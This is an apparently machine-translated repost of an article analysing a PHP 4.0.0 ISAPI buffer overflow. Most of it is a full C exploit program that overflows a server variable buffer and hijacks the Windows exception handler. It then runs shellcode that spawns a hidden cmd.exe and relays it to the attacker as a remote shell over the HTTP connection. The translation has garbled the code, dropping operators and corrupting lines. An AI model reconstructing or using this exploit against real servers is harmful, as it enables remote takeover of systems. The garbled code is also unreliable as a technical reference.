PHP4.0.0 Remote Overflow Source Code Analysis and Test Program

zhaozj2021-02-08  216

When PHP4.0.0 came out, we tested that PHP4isasp.dll had buffering vulnerabilities, the following is the relevant source code for php4isapi.c:

Static void SAPI_ISAPI_REGISTER_SERVER_VARIABLES (ZVAL * TRACK_VARS_ARRAY ELS_DC SLS_DC PLS_DC)

{

Char static_variable_buf [isapi_server_var_buf_size];

CHAR * VARIABLE_BUF;

DWORD VARIABLE_LEN = isapi_server_var_buf_size;

CHAR * VARIABLE;

Char * strtok_buf = NULL;

LPEXTENSION_CONTROL_BLOCK LPECB;

Char ** p = isapi_server_variables;

LPECB = (LPEXTENSION_CONTROL_BLOCK) SG (Server_Context);

/ * Register the standard isapi variables * /

While (* p) {

VARIABLE_LEN = isapi_server_var_buf_size;

IF (lpecb-> getServerVariable (lpecb-> connid, * p, static_variable_buf, & variable_len)

&& stat_variable_buf [0]) {

PHP_REGISTER_VARIABLE (* p, static_variable_buf, track_vars_array els_cc pls_cc);

Else IF (getLastError () == Error_INSUFFICIENT_BUFFER) {

Variable_buf = (char *) Emalloc (variable_len);

IF (LPECB-> GetSerVariable (lpecb-> connid, * p, variable_buf, & variable_len)

&& variable_buf [0]) {

PHP_REGISTER_VARIABLE (* p, variable_buf, track_vars_array els_cc pls_cc);

}

Efree (variable_buf);

}

P ;

}

/ * Php_self support * /

#ifdef with_zeus

IF (LPECB-> GetSerVariable (LPECB-> ConnID, "Path_INFO", Static_Variable_buf, & variable_len

#ELSE

IF (LPECB-> GetSerVariable (LPECB-> ConnID, "Script_name", Static_Variable_buf, & variable_len)

/ * PHP4.0.0 Vulnerability is located, buffering overflow. At this time, the variable_len variable is already the last call GetServerVariable return variable * /

/ * Php4.0.3 has been repaired * /

#ENDIF

&& stat_variable_buf [0]) {

PHP_REGISTER_VARIABLE ("PHP_SELF", Static_Variable_buf, TRACK_VARS_ARRAY ELS_CC PLS_CC);

/ *

Because the shape is covered, this shape is also difficult to forge, so the traditional overflow attack is invalid because this call cannot return, but we can use an abnormal structure attack, you can see my related articles.

* /

}

/ * Register the intence bits of all_http * /

VARIABLE_LEN = isapi_server_var_buf_size;

IF (LPECB-> GetServerVariable (LPECB-> ConnID, "All_HTTP", Static_Variable_buf, & variable_len) {

Variable_buf = static_variable_buf;

} else {

IF (getLastError () == Error_INSUFFICIENT_BUFFER {

Variable_buf = (char *) Emalloc (variable_len);

IF (! lpecb-> getServerVariable (LPECB-> ConnID, "All_http", variable_buf, & variable_len) {

Efree (variable_buf);

Return;

}

} else {

Return;

}

}

Variable = php_strtok_r (variable_buf, "/ r / n", & setok_buf);

While (variable) {

Char * colon = strchr (variable, ':');

IF (colon) {

CHAR * VALUE = COLON 1;

While (* value == '') {

Value ;

}

* colon = 0;

PHP_REGISTER_VARIABLE (Variable, Value, Track_vars_Array ELS_CC PLS_CC);

* colon = ':';

}

Variable = php_strtok_r (NULL, "/ R / N", & Strtok_buf);

}

IF (variable_buf! = static_variable_buf) {

Efree (variable_buf);

}

}

Because of the problem of the formation, the use of the covered exception handling structure allows the shellcode code to be controlled. However, because the abnormal structure code is relatively uniform, it may be necessary to adjust the relevant parameters based on the Windows version of the attacked system. Specific Attack Test Code:

/ *

PHP4.0 overflow program phphack.c Ver 1.0

Copy by yuan 2000.08.16

* /

#include

#include

#include

#include

// #define debug

// # Define reteipaddr Eipwin2000

#define fnendlong 0x08

#define nopcode 'b' // inc Edx 0x90

#define noplong 0x3c

#define buffsize 0x20000

#define reteipaddress 0x900 4

#define shellbuffsize 0x800

#define shellfnnums 9 # define dataxorcode 0xAA

#define lockbignum 19999999

#define LockBignum2 13579139

#define shellport 0x1f90 // 0x1f90 = 8080

#define Webport 80

Void shellcodefnlock ();

Void shellcodefn (char * ecb);

Void Cleanchkesp (Char * Fnadd, Char * Shellbuff, Char * Chkespadd, Int Len)

INT main (int Argc, char ** argv)

{

Char * server;

Char * str = "loadLibrarya" "/ x0" "createpipe" "/ x0"

"CreateProcessa" "/ x0" "closehandle" "/ x0"

"Peeknamedpipe" "/ x0"

"Readfile" "/ x0" "Writefile" "/ x0"

"Sleep" "/ x0"

"cmd.exe" "/ x0" "/ x0d / x0a" "it" "/ x0d / x0a" "/ x0"

"Xordata" "/ x0"

"strend";

CHAR BUFF1 [] = "get /default.php4";

Char buff2 [] = "http / 1.1 / nhost:";

Char * fnendstr = "/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90";

CHAR SRLF [] = "/ x0d / x0a / x00 / x00";

Char Eipjmpesp [] = "/ xb7 / x0e / xfa / x7f";

// Push ESP

// Ret

Char energyxcept [] = "/ xb8 / x0e / xfa / x7f";

// Ret

Char Eipjmpesi [] = "/ x08 / x88 / xfa / x7f";

Char Eipjmpedi [] = "/ xbe / x8b / xfa / x7f";

Char Eipjmpebx [] = "/ x73 / x67 / xfa / x7f";

// push ebx

// Ret

/ *

JMP EBX function code address, Chinese Winnt, Chinese Win2000 this address fixed

This is in a c_936.nls module

When Win2000 occurs an exception call exception handling structure code, EBX points to anomalous structure. The old version of Winnt is ESI, available 7FFA8808, which is EDI, and 7FFA8BBE can be used.

* /

CHAR BUFF [Buffsize];

Char recvbuff [buffsize];

Char shellcodebuff [0x1000];

Struct SockAddr_in S_IN2, S_IN3;

Struct hostent * he;

Char * shellcodefnadd, * chkespadd;

Unsigned int sendpacketlong;

// unsigned

INT I, J, K;

UNSIGNED CHAR TEMP;

Int fd; u_short port, port1, shellcodeport;

Socket D_IP;

Wsadata wsadata;

INT OFFSET = 0;

Int xordaBegin;

INT LOCKINTVAR1, LOCKINTVAR2;

Char Lockcharvar;

INT OVERADD = Reteipaddress;

Int result;

FPRINTF (stderr, "/ n php4.0 for win32 overflow program 2.0.");

FPRINTF (stderr, "/ n copy by yuan 2000.8.16.");

FPrintf (stderr, "/ n wellcome to my homepage http://yuange.yeah.net.");

FPRINTF (stderr, "/ n welcome to http://www.nsfocus.com.");

FPRINTF (stderr, "/ n usage:% s [webport] / n", argv [0]);

IF (argc <2) {

FPRINTF (stderr, "/ n please enter the web server:");

Gets (recvbuff);

For (i = 0; i

IF (Recvbuff [I]! = ') Break;

}

Server = Recvbuff;

IF (i

/ *

FPRINTF (stderr, "/ n please enter the offset (0-3):");

Gets (buff);

For (i = 0; i

IF (buff [I]! = ') Break;

}

OFFSET = ATOI (BUFF I);

* /

}

Result = WSASTARTUP (Makeword (1, 1), & WSADATA);

IF (Result! = 0) {

FPRINTF (stderr, "Your Computer Was Not Connected"

"To the Internet at the time That"

"this program was launched, or you"

"Do Not Have A 32-bit"

"Connection to the Internet.");

Exit (1);

}

/ *

IF (argc> 2) {

OFFSET = ATOI (Argv [2]);

}

Overadd = offset;

IF (Offset <0 || Offset> 3) {

FPRINTF (stderr, "/ n offset error! offset 0 - 3.");

Gets (buff);

Exit (1);

}

* /

IF (argc <2) {

// wsacleanup ();

// EXIT (1);

}

Else Server = argv [1];

For (i = 0; i

IF (Server [i]! = ')

Break;

}

IF (i

IF (Server [i] == ':') {

IF (Server [i 1] == '//' || Server [i 1] == '/') {

IF (Server [i 2] == '//' || Server [i 2] == '/') {

Server = i;

Server = 3;

Break;

}

}

}

}

For (i = 1; i <= strlen (server); i) {

IF (Server [i-1] == '//' || Server [i-1] == '/') Server [i-1] = 0;

}

D_IP = inet_addr (server);

IF (D_IP == - 1) {

He = gethostByname (Server);

IF (! HE)

{

WSACLEANUP ();

Printf ("/ n can't get the ip of% s! / n", server);

Gets (buff);

Exit (1);

}

Else Memcpy (& D_IP, HE-> H_ADDR, 4);

}

IF (Argc> 2) Port = ATOI (Argv [2]);

Else Port = Webport;

IF (port == 0) Port = Webport;

FD = Socket (AF_INET, SOCK_STREAM, 0);

i = 8000;

Setsockopt (FD, SOL_SOCKET, SO_RCVTIMEO, (Const Char *) & I, SizeOf (i));

S_IN3.SIN_FAMILY = AF_INET;

S_IN3.SIN_PORT = HTONS (Port);

S_IN3.SIN_ADDR.S_ADDR = D_IP;

Printf ("/ N Nuke IP:% S Port% D", INET_NTOA (S_IN3.SIN_ADDR), HTONS (S_IN3.SIN_PORT));

IF (Connect (FD, (Struct SockAddr *) & S_IN3, SIZEOF (Struct SockAddr_in))! = 0)

{

CloseSocket (FD);

WSACLEANUP ();

FPRINTF (stderr, "/ n connect err.");

Gets (buff);

Exit (1);

}

_asm {

MOV ESI, ESP

CMP ESI, ESP

}

_chkesp ();

Chuestspadd = _chkesp;

Temp = * chuest;

IF (Temp == 0xE9) {

chuesthant

I = * (int *) Chuestion;

Chkespadd = i;

Chkespadd = 4;

}

Shellcodefnadd = shellcodefnlock;

Temp = * shellcodefnadd;

IF (Temp == 0xE9) {

shellcodefnadd;

K = * (int *) shellcodefnadd;

Shellcodefnadd = K; shellcodefnadd = 4;

}

For (k = 0; k <= 0x500; k) {

IF (MemcMP (Shellcodefnadd K, Fnendstr, Fnendlong) == 0) Break;

}

MEMSET (BUFF, NOPCODE, BUFFSIZE);

IF (argc> 4) {

Memcpy (buff, Argv [4], Strlen (Argv [4]));

}

Else Memcpy (Buff, Buff1, Strlen);

// strcpy (buff, buff1);

// MEMSET (Buff), Nopcode, 1);

Memcpy (buff Overadd 0x60 Noplong, shellcodefnadd k 4,0x80);

// Memcpy (buff noplong, shellcodefnadd k 4, 0x80);

Shellcodefnadd = shellcodefn;

Temp = * shellcodefnadd;

IF (Temp == 0xE9) {

shellcodefnadd;

K = * (int *) shellcodefnadd;

Shellcodefnadd = K;

Shellcodefnadd = 4;

}

For (k = 0; k <= 0x1000; k) {

IF (MemcMP (Shellcodefnadd K, Fnendstr, Fnendlong) == 0) Break;

}

Memcpy (shellcodeBuff, shellcodefnadd, k); // j);

Cleanchkesp (Shellcodefnadd, ShellcodeBuff, ChkespAdd, K);

FOR (i = 0; i <0x400; i) {

IF (Memcmp (STR I, "Strend", 6) == 0) Break;

}

Memcpy (ShellcodeBuff K, STR, I);

SendPacketlong = K i;

For (k = 0; k <= 0x200; k) {

IF (MemcMP (Buff Overadd Noplong K, Fnendstr, Fnendlong) == 0) Break;

// IF (Memcmp (Buff Noplong K, Fnendstr, Fnendlong) == 0) Break;

}

For (i = 0; i

Temp = shellcodebuff [i];

Temp = DataXorcode;

IF (Temp <= 0x10 || Temp == '"|| Temp ==' / '|| Temp ==' // '|| Temp ==' 0 '|| Temp = = '?' || Temp == '%') {

BUF [OVERADD NOPLONG K] = '0';

// buff [Noplong K] = '0';

K;

TEMP = 0x40;}

BUF [OVERADD NOPLONG K] = TEMP;

// buff [Noplong K] = TEMP;

K;

}

// Memcpy (Buff Overadd Noplong K, ShellcodeBuff, SendPacketLong);

// k = sendpacketlong;

/ *

FOR (i = -0x30; i <0x30; i = 4) {

Memcpy (buff Overadd i, EIPEXCEPT, 4);

}

Memcpy (Buff Overadd i, Eipjmpesp, 4);

* /

For (i = -40; i <0x40; i = 8) {

Memcpy (buff Overadd I, "/ X42 / X42 / X42 / X2D", 4);

Memcpy (buff Overadd i 4, Eipjmpebx, 4);

}

Memcpy (buff Overadd i 8, "/ X42 / X42 / X42 / X42 / X61 / X61 / X61 / X61 / X61 / X61 / X61 / X61 / X61 / X5B / XFF / X63 / X64 / X42 / X42 / X42 / X42 ", 24);

// fprintf (stderr, "/ n Offset:% D", OFFSET);

/ *

192.168.8.48

IF (argc> 2) {

Server = argv [2];

IF (STRCMP (Server, "WIN9X") == 0) {

Memcpy (buff Overadd, EIPWIN9X, 4);

FPRINTF (stderr, "/ n nuke Win9x.");

}

IF (STRCMP (Server, "Winnt") == 0) {

Memcpy (buff Overradd, EIPWINNT, 4);

FPRINTF (stderr, "/ n nuke winnt.");

}

}

* /

Sendpacketlong = K Overadd i Noplong;

// sendpacketlong = k noplong;

STRCPY (Buff SendPacketlong, BUFF2);

STRCPY (BUFF SendPacketlong Strlen (BUFF2), Server);

Sendpacketlong = Strlen (BUFF);

// buff [sendpacketlong] = 0x90;

STRCPY (BUFF SendPacketlong, "/ N / N");

/ *

BUF [SendPacketlong] = 0x90;

FOR (i = -0x30; i <0x30; i = 4) {

Memcpy (buff SendPacketlong Overadd i, EIPEXCEPT, 4);

}

Memcpy (Buff SendPacketlong Overadd I, EIPWINNT, 4);

STRCPY (Buff SendPacketlong Overadd i 4, "/ XFF / X63 / X64");

STRCPY (Buff SendPacketlong Overadd i 20, "/ N / N");

* /

// Printf ("/ N Send Buff: / N% S", BUFF); // STRCPY (BUFF OVERADD NOPLONG, Shellcode);

Sendpacketlong = Strlen (BUFF);

/ *

#ifdef debug

_asm {

LEA ESP, BUFF

Add ESP, OVERADD

RET

}

#ENDIF

* /

IF (argc> 6) {

IF (strCMP (Argv [6], "Debug") == 0) {

_asm {

LEA ESP, BUFF

Add ESP, OVERADD

RET

}

}

}

XORDATABEGIN = 0;

FOR (i = 0; i <1; i) {

J = sendpacketlong;

FPRINTF (stderr, "/ n send packet% d bytes.", J);

// fprintf (stderr, "/ n SNED: / N% S", BUFF);

Send (FD, BUFF, J, 0);

K = RECV (FD, Recvbuff, 0x1000, 0);

IF (K> = 8 && Memcmp (Recvbuff, "XORDATA", 8) == 0) {

XORDATABEGIN = 1;

K = -1;

FPRINTF (stderr, "/ n ok! / n");

}

IF (k> 0) {

RECVBUFF [K] = 0;

FPRINTF (stderr, "/ n recv: / n% s", recvbuff);

}

}

K = 1;

IOCTLSocket (FD, Fionbio, & K);

// fprintf (stderr, "/ n now begin: / n");

Lockintvar1 = lockbignum2% LockBignum;

Lockintvar2 = Lockintvar1;

/ *

For (i = 0; i

SRLF [I] ^ = DataXorcode;

}

Send (FD, SRLF, STRLEN (SRLF), 0);

Send (FD, SRLF, STRLEN (SRLF), 0);

Send (FD, SRLF, STRLEN (SRLF), 0);

* /

K = 1;

While (k! = 0) {

IF (k <0) {

Gets (buff);

K = Strlen (BUFF);

Memcpy (buff K, SRLF, 3);

// Send (FD, SRLF, Strlen (SRLF), 0);

// fprintf (stderr, "% s", buff);

For (i = 0; i

Lockintvar2 = lockintvar2 * 0x100;

Lockintvar2 = lockintvar2% LockBignum;

LockCharvar = Lockintvar2% 0x100;

BUFF [I] ^ = LOCKCHARVAR; // DataXorcode;

// buff [i] ^ = DataXorcode;

}

Send (FD, BUFF, K 2, 0);

// Send (FD, SRLF, Strlen (SRLF), 0);

}

K = RECV (FD, BUFF, 0X1000, 0);

IF (xordATABEGIN == 0 && K> = 8 && Memcmp (buff, "xordata", 8) == 0) {xordatabegin = 1;

K = -1;

}

IF (k> 0) {

// fprintf (stderr, "rv% D Bytes", K);

IF (xordATABEGIN == 1) {

For (i = 0; i

Lockintvar1 = Lockintvar1 * 0x100;

Lockintvar1 = lockintvar1% LockBignum;

Lockcharvar = lockintvar1% 0x100;

BUFF [I] ^ = LOCKCHARVAR; // DataXorcode;

}

}

BUFF [K] = 0;

FPRINTF (stderr, "% s", buff);

}

// IF (k == 0) Break;

}

CloseSocket (FD);

WSACLEANUP ();

FPRINTF (stderr, "/ n the server close connect.");

Gets (buff);

Return (0);

}

Void shellcodefnlock ()

{

_asm {

NOP

NOP

NOP

NOP

NOP

NOP

NOP

NOP

_emit ('.')

_emit ('p')

_emit ('h')

_emit ('p')

_emit ('4')

_emit ('?')

JMP next

GetIAdd: Pop Edi

Push EDI

POP ESI

Push EBX // ECB

Push EBX // Call Shellcodefn Ret Address

XOR ECX, ECX

LOOPLOCK: LODSB

CMP AL, CL

JZ Shell

CMP Al, 0x30

JZ Clean0

Sto: xor al, DataXorcode

Stosb

JMP LOOPLOCK

Clean0: Lodsb

SUB Al, 0x40

JMP STO

Next: Call getEDiadd

Shell: NOP

NOP

NOP

NOP

NOP

NOP

NOP

NOP

}

}

Void shellcodefn (char * ecb)

{Char Buff [shellbuffsize 2];

INT * EXCEPT [2];

FarProc SleepAdd;

FarProc WritefileAdd;

FarProc ReadfileAdd;

FarProc PeeknamedpiPireAdd;

FarProc CloseHandD;

FarProc CreateProcessAdd;

FarProc CreatePipeAdd;

FarProc ProcloadLib;

FarProc APIFNADD [1];

FarProc ProcgetAdd = 0;

FARPROC WRITECLIENT = * (int *) (ECB 0x84);

FarProc ReadClient = * (int *) (ECB 0x88);

HCONN Connid = * (int *) (ECB 8);

Char * stradd;

INT IMGBASE, FNBASE, K, L

Handle Lionle; // LibWSOCK32;

Startupinfo SiINFO;

PROCESS_INFORMATION processinformation;

Handle Hreadpipe1, hwritepipe1, hreadpipe2, hwritepidipe2;

INT LBYTESREAD;

INT LOCKINTVAR1, LOCKINTVAR2;

Char Lockcharvar;

Security_attributes sa;

_asm {JMP nextcall

GetStradd: Pop Stradd

Lea Edi, Except

Mov DWORD PTR FS: [0], EDI

}

Except [0] = 0xfffffffff;

Except [1] = stradd-0x07;

IMGBase = 0x77E00000;

_asm {

Call getExceptretadd

}

For (; imgbase <0xBFFA0000, ProcgetAdd == 0;) {

IMGBase = 0x10000;

IF (imgbase == 0x78000000) IMGBase = 0xBff00000;

IF (* (Word *) IMGBASE == 'ZM' && * (IMGBASE * (INT *) == 'EP') {

Fnbase = * (int *) (IMGBASE * (INT *) 0x78) IMGBASE;

K = * (int *) (fnbase 0xc) IMGBASE;

IF (* (int *) k == 'NREK' && * (int *) (k 4) == '23LE') {

LibHandle = IMGBASE;

K = IMGBASE * (INT *) (FNBase 0x20);

For (l = 0; l <* (int *) (fnbase 0x18); L, K = 4) {

IF (* (INT *) (IMGBASE * (INT *) K) == PTEG '&& * (INT *) (4 IMGBase * (INT *) K) ==' acor '

{

K = * (Word *) (L L IMGBASE * (INBASE 0x24));

K = * (int *) (fnbase 0x10) -1;

K = * (int *) (K K K K IMGBASE * (INT *) (FNBase 0x1c));

ProcgetAdd = K IMGBASE;

Break;

}

}

}

}

}

// Search Kernel32. DLL module address and API function getProcAddress address

/ (Note that this is not in the case where the search page is processed.

IF (procgetadd == 0) goto die;

FOR (k = 1; k

Apifnadd [k] = procgetadd (libhandle, stradd);

For (;; stradd) {

IF (* (stradd) == 0 && * (stradd 1)! = 0) Break;

}

stradd;

}

Sa.nlength = 12;

Sa.lpsecurityDescriptor = 0;

Sa.binherithandle = true;

CreatePipeadd (& Hreadpipe1, & HwritePipe1, & Sa, 0);

CreatePipeadd (& Hreadpipe2, & HwritePipe2, & Sa, 0);

// ZeromeMory (& SiInfo, SIZEOF (SIINFO);

_asm {

Lea Edi, SIINFO

XOR EAX, EAX

MOV ECX, 0x11

RepNZ Stosd

}

Siinfo.dwflags = startf_useshowwindow | Startf_usestdhandles;

SiINFO.WSHOWINDOW = SW_HIDE;

SiINFO.HSTDINPUT = HREADPIPE2;

SiINFO.HSTDOUTPUT = hwritepidipe1;

SiINFO.HSTDERROR = hwritepidipe1;

K = 0;

// while (k == 0)

// {

K = CreateProcessAdd (NULL, STRADD, NULL, NULL, 1, 0, NULL, NULL, & SIINFO, & ProcessInformation);

STRADD = 8;

//}

Peeknamedpipeadd (Hreadpipe1, Buff, Shellbuffsize, & lbytesRead, 0, 0);

K = 8;

WriteClient (Connid, Stradd 9, & K, 0);

Lockintvar1 = lockbignum2% LockBignum;

Lockintvar2 = Lockintvar1;

While (1) {

Peeknamedpipeadd (Hreadpipe1, Buff, Shellbuffsize, & lbytesRead, 0, 0);

IF (LbytesRead> 0) {

Readfileadd (Hreadpipe1, Buff, LbytesRead, & lbytesread, 0);

IF (LbytesRead> 0) {

FOR (k = 0; k

Lockintvar2 = lockintvar2 * 0x100;

Lockintvar2 = lockintvar2% LockBignum;

LockCharvar = Lockintvar2% 0x100;

BUFF [K] ^ = LOCKCHARVAR; // DataXorcode;

// buff [k] ^ = DataXorcode;

}

WriteClient (Connid, Buff, & lbytesRead, 0); // hse_io_sync);

}

}

Else {

Lbytesread = shellbuffsize;

K = ReadClient (ConnID, BUFF, & LBYTESREAD);

IF (k! = 1) {

K = 8;

WritefileAdd (hwritepipe2, stradd, k, & k, 0); // exit cmd.exe

WritefileAdd (hwritepipe2, stradd, k, & k, 0); // exit cmd.exewritefileadd (hwritepipe2, stradd, k, & k, 0); // EXIT cmd.exe

While (1) {

SleepAdd (0x7ffffff); // is dead

}

}

Else {

FOR (k = 0; k

Lockintvar1 = Lockintvar1 * 0x100;

Lockintvar1 = lockintvar1% LockBignum;

Lockcharvar = lockintvar1% 0x100;

BUFF [K] ^ = LOCKCHARVAR; // DataXorcode;

// buff [k] ^ = DataXorcode;

}

WritefileAdd (hwritepipe2, buff, lbytesread, & lbytead, 0);

// SleepAdd (1000);

}

}

}

Die: Goto Die;

_asm {

getExceptretadd: POP EAX

Push EAX

MOV EDI, DWORD PTR [stradd]

MOV DWORD PTR [EDI-0X0E], EAX

RET

Errprogram: MOV Eax, DWORD PTR [ESP 0x0c]

Add Eax, 0xB8

Mov DWORD PTR [EAX], 0x11223344 // stradd-0xe

XOR Eax, EAX / / 2

Ret // 1

ExecptProgram: JMP errprogram // 2 bytes stradd-7

NextCall: Call getstradd //5 bytes

NOP

NOP

NOP

NOP

NOP

NOP

NOP

NOP

NOP

}

}

Void Cleanchkesp (Char * Fnadd, Char * Shellbuff, Char * Chkesp, Int Len)

{

INT I, K;

UNSIGNED CHAR TEMP;

Char * Calladd;

For (i = 0; i

Temp = shellbuff [i];

IF (temp == 0xe8) {

K = * (int *) (shellbuff i 1);

Calladd = fnadd;

Calladd = k;

Calladd = i;

Calladd = 5;

IF (calladd == chkesp) {

Shellbuff [I] = 0x90;

ShellBuff [i 1] = 0x43; // incn

Shellbuff [i 2] = 0x4b; // DEC EBX

Shellbuff [i 3] = 0x43;

Shellbuff [i 4] = 0x4b;

}

}

}

}

转载请注明原文地址:https://www.9cbs.com/read-2117.html

New Post(0)